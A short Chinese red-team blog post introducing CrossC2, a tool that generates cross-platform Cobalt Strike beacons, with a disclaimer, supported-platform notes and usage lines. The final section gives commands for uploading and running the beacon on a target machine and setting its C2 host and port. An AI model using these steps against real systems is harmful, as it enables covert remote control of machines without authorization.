【红队】CrossC2框架,生成CS的跨平台beacon

免责声明

本公众号所提供的文字和信息仅供学习和研究使用，请读者自觉遵守法律法规，不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

工具介绍

面向企业自身及红队人员的安全评估框架，支持CobaltStrike对其他平台(Linux/MacOS/...)的安全评估，支持自定义模块，及包含一些常用的渗透模块。

受限说明:

• CobaltStrike: 暂时仅支持3.14最后一个版本(bug fixs), 以及4.x版本(详见cs4.1分支).

• Linux: 特别老旧的系统可以选择cna中的"Linux-GLIBC"选项（2010年左右）

• MacOS: 新系统仅支持64位程序

• iOS: sandbox

• Embedded: only *nix

工具使用

在目标机上运行CrossC2插件生成的一键在线脚本将beacon上传到目标机进行赋权操作后设置 beacon 的工作目录并运行：export CCPATH=/opt/ && /tmp/c2暂时指定beacon的协议库并运行：/tmp/c2 /tmp/c2-rebind.so临时设置信标的C2配置：export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2设置DEBUG查看beacon在线状态：export CCDEBUG=1 && /tmp/c2

原文始发于微信公众号（贝雷帽SEC）：【红队】CrossC2框架,生成CS的跨平台beacon